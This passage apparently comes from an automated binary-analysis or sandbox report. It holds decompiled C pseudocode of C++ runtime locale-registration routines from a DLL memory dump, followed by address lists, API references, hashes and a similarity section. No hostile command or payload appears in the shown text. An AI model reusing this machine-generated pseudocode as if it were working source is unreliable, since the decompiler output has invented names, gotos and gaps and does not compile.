																E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t389, _t515, _t528);
																E6D476A10(_t550 - 0x14, 0);
																_t529 =  *0x6d53fdec; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6D451D10();
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6D476A77(_t550 - 0x14);
																	return E6D490E67(_t516);
																} else {
																	__eflags = _t529;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6D4827D7(_t389, _t420, _t510, _t516, _t529, __eflags, _t554) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t389, _t516, _t529);
																			E6D476A10(_t550 - 0x14, 0);
																			_t530 =  *0x6d53fdc4; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6D451D10();
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6D476A77(_t550 - 0x14);
																				return E6D490E67(_t517);
																			} else {
																				__eflags = _t530;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6D48283F(_t389, _t427, _t510, _t517, _t530, __eflags, _t554) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t389, _t517, _t530);
																						E6D476A10(_t550 - 0x14, 0);
																						_t531 =  *0x6d53fdf0; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6D451D10();
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6D476A77(_t550 - 0x14);
																							return E6D490E67(_t518);
																						} else {
																							__eflags = _t531;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6D4828A7(_t389, _t434, _t510, _t518, _t531, __eflags, _t554) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t389, _t518, _t531);
																									E6D476A10(_t550 - 0x14, 0);
																									_t532 =  *0x6d53fdf4; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6D451D10();
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6D476A77(_t550 - 0x14);
																										return E6D490E67(_t519);
																									} else {
																										__eflags = _t532;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6D48290F(_t389, _t441, _t510, _t519, _t532, __eflags, _t554) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t389, _t519, _t532);
																												E6D476A10(_t550 - 0x14, 0);
																												_t533 =  *0x6d53fe10; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6D451D10();
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6D476A77(_t550 - 0x14);
																													return E6D490E67(_t520);
																												} else {
																													__eflags = _t533;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6D48298A(_t389, _t448, _t510, _t520, _t533, __eflags, _t554) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t389, _t520, _t533);
																															E6D476A10(_t550 - 0x14, 0);
																															_t534 =  *0x6d53fde0; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6D451D10();
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6D476A77(_t550 - 0x14);
																																return E6D490E67(_t521);
																															} else {
																																__eflags = _t534;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6D4829F6(_t389, _t455, _t510, _t521, _t534, __eflags, _t554) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t389, _t521, _t534);
																																		E6D476A10(_t550 - 0x14, 0);
																																		_t535 =  *0x6d53fe14; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6D451D10();
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6D476A77(_t550 - 0x14);
																																			return E6D490E67(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6D482A62(_t389, _t462, _t510, _t522, _t535, __eflags, _t554) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
																																					E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t389, _t522, _t535);
																																					E6D476A10(_t550 - 0x14, 0);
																																					_t536 =  *0x6d53fde4; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6D451D10();
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6D476A77(_t550 - 0x14);
																																						return E6D490E67(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6D482AC8(_t389, _t469, _t510, _t523, _t536, __eflags, _t554) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6D451940();
																																								E6D4924F4(_t550 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(4);
																																								E6D490E9E(0x6d4fefbc, _t389, _t523, _t536);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_push( *((intOrPtr*)(_t550 + 8)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6d5041ac;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6D4868B7(_t389, _t473, _t510, _t523, _t537,  *_t175, _t554);
																																								return E6D490E67(_t537);
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6D478A0B(__eflags, _t523);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6d53fde4 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6D478A0B(__eflags, _t522);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6d53fe14 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6D478A0B(__eflags, _t521);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6d53fde0 = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6D478A0B(__eflags, _t520);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6d53fe10 = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6D478A0B(__eflags, _t519);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6d53fdf4 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6D478A0B(__eflags, _t518);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6d53fdf0 = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6D478A0B(__eflags, _t517);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6d53fdc4 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6D478A0B(__eflags, _t516);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6d53fdec = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6D478A0B(__eflags, _t515);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6d53fdd8 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6D478A0B(__eflags, _t514);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6d53fddc = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6D478A0B(__eflags, _t513);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6d53fe08 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6D478A0B(__eflags, _t512);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6d53fe0c = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

0x6d4809f6
0x6d4809f6
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a27
0x6d480a2c
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34

APIs

__EH_prolog3.LIBCMT ref: 6D4809FD
std::_Lockit::_Lockit.LIBCPMT ref: 6D480A07

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480A41
std::_Facet_Register.LIBCPMT ref: 6D480A58
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480A78
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480A96

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 0cbb8f35d1f16c288ac49c307b8f729b754e1f9498926055941c2b6fe08d9374
Instruction ID: b21035272712467243b7f4e3958dcc3923e8df0d1bd56202bde803e3550932e6
Opcode Fuzzy Hash: 0cbb8f35d1f16c288ac49c307b8f729b754e1f9498926055941c2b6fe08d9374
Instruction Fuzzy Hash: C011AC328041299BCF15DFA6C840EEE77B5AF84358F26440DD610AB291DF74EE028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480B42, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D480B42(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;
				void* _t466;

				_t428 = __edx;
				_t327 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t462 - 0x14, 0);
				_t441 =  *0x6d53fddc; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6D451D10();
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6D476A77(_t462 - 0x14);
					return E6D490E67(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6D4826CE(__ebx, _t330, __edx, _t430, _t441, __eflags, _t466) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t462 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t430, _t441);
							E6D476A10(_t462 - 0x14, 0);
							_t442 =  *0x6d53fdd8; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6D451D10();
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6D476A77(_t462 - 0x14);
								return E6D490E67(_t431);
							} else {
								__eflags = _t442;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6D482752(_t327, _t337, __edx, _t431, _t442, __eflags, _t466) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t462 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t327, _t431, _t442);
										E6D476A10(_t462 - 0x14, 0);
										_t443 =  *0x6d53fdec; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6D451D10();
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6D476A77(_t462 - 0x14);
											return E6D490E67(_t432);
										} else {
											__eflags = _t443;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6D4827D7(_t327, _t344, __edx, _t432, _t443, __eflags, _t466) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t462 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t327, _t432, _t443);
													E6D476A10(_t462 - 0x14, 0);
													_t444 =  *0x6d53fdc4; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6D451D10();
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6D476A77(_t462 - 0x14);
														return E6D490E67(_t433);
													} else {
														__eflags = _t444;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6D48283F(_t327, _t351, _t428, _t433, _t444, __eflags, _t466) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t327, _t433, _t444);
																E6D476A10(_t462 - 0x14, 0);
																_t445 =  *0x6d53fdf0; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6D451D10();
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6D476A77(_t462 - 0x14);
																	return E6D490E67(_t434);
																} else {
																	__eflags = _t445;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6D4828A7(_t327, _t358, _t428, _t434, _t445, __eflags, _t466) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t327, _t434, _t445);
																			E6D476A10(_t462 - 0x14, 0);
																			_t446 =  *0x6d53fdf4; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6D451D10();
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6D476A77(_t462 - 0x14);
																				return E6D490E67(_t435);
																			} else {
																				__eflags = _t446;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6D48290F(_t327, _t365, _t428, _t435, _t446, __eflags, _t466) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t327, _t435, _t446);
																						E6D476A10(_t462 - 0x14, 0);
																						_t447 =  *0x6d53fe10; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6D451D10();
